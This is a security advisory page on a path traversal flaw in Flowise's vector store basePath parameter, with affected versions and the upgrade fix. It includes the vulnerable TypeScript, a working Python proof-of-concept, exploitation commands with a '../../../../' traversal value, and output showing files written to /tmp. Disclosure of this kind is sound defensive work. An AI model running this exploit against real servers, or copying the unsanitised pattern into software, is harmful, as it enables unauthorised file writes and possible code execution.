Monitor vulnerabilities like this one. Sign up free to get alerted when software you use is affected.
4.9

Flowise: Attacker Can Write Data to Arbitrary Server Locations

GHSA-w6v6-49gh-mc9w
Summary

Flowise's vector store allows an authenticated attacker to write data to any location on the server's file system. This can happen if an attacker has valid API credentials and a document store with processed chunks. To fix this, Flowise developers should validate and sanitize the `basePath` parameter to prevent unauthorized file system access.

What to do
  • Update henryheng flowise to version 3.1.0.
  • Update henryheng flowise-components to version 3.1.0.
Affected software
Ecosystem VendorProductAffected versions
npm henryheng flowise <= 3.0.13
Fix: upgrade to 3.1.0
npm henryheng flowise-components <= 3.0.13
Fix: upgrade to 3.1.0
Original title
Flowise: Path Traversal in Vector Store basePath
Original description
## Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

## Vulnerability Details

| Field | Value |
|-------|-------|
| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |
| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |

## Prerequisites

1. **Authentication**: Valid API token with `documentStores:upsert-config` permission
2. **Document Store**: An existing Document Store with at least one processed chunk
3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)

## Root Cause

### Faiss (`Faiss.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
const basePath = nodeData.inputs?.basePath as string // User-controlled
// ...
const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
await vectorStore.save(basePath) // Direct filesystem write, no validation
}
```

### SimpleStore (`SimpleStore.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
const basePath = nodeData.inputs?.basePath as string // User-controlled

let filePath = ''
if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
else filePath = basePath // Used directly without sanitization

const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path
}
```

## Impact

An authenticated attacker can:

1. **Write files to arbitrary locations** on the server filesystem
2. **Overwrite existing files** if the process has write permissions
3. **Potential for code execution** by writing to web-accessible directories or startup scripts
4. **Data exfiltration** by writing to network-mounted filesystems

## Proof of Concept

### poc.py

```python
#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""

import argparse
import json
import urllib.request
import urllib.error

def post_json(url, data, headers):
req = urllib.request.Request(
url,
data=json.dumps(data).encode("utf-8"),
headers={**headers, "Content-Type": "application/json"},
method="POST",
)
with urllib.request.urlopen(req, timeout=120) as resp:
return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True)
ap.add_argument("--token", required=True)
ap.add_argument("--store-id", required=True)
ap.add_argument("--credential", required=True)
ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
args = ap.parse_args()

payload = {
"storeId": args.store_id,
"vectorStoreName": "faiss",
"vectorStoreConfig": {"basePath": args.base_path},
"embeddingName": "openAIEmbeddings",
"embeddingConfig": {"credential": args.credential},
}

url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
headers = {"Authorization": f"Bearer {args.token}"}

try:
status, body = post_json(url, payload, headers)
print(body)
except urllib.error.HTTPError as e:
print(e.read().decode())

if __name__ == "__main__":
main()
```

### Setup

1. Create a Document Store in Flowise UI
2. Add a Document Loader (e.g., Plain Text) with any content
3. Click "Process" to create chunks
4. Note the Store ID from the URL
5. Get your embedding credential ID from Settings → Credentials

### Exploitation

```bash
# Write to /tmp
python poc.py \
--target http://127.0.0.1:3000 \
--token <API_TOKEN> \
--store-id <STORE_ID> \
--credential <OPENAI_CREDENTIAL_ID> \
--base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py \
--target http://127.0.0.1:3000 \
--token <API_TOKEN> \
--store-id <STORE_ID> \
--credential <OPENAI_CREDENTIAL_ID> \
--base-path "../../../../tmp/traversal-test"
```

### Evidence

```
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned

{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x 4 user wheel 128 Jan 17 12:00 .
drwxrwxrwt 12 root wheel 384 Jan 17 12:00 ..
-rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json
-rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index
```
ghsa CVSS4.0 4.9
Vulnerability type
CWE-22 Path Traversal
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026